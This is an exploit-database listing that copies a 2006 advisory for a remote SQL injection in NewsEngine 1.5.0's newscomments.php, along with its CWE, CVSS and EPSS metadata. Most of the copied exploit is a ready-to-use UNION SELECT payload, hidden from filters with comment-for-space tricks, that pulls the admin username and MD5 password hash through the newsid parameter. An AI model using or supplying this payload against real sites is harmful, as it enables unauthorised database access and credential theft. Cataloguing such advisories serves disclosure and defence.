Advertisement






ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2006-06-15
CPE
cpe:cpe:/a:ewsengine:newscomments:1.5.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060063

Below is a copy:

# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Author :   ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0
,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/news
1_user/**/where/**/userid=1/*

Admin MD5 HaSh

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.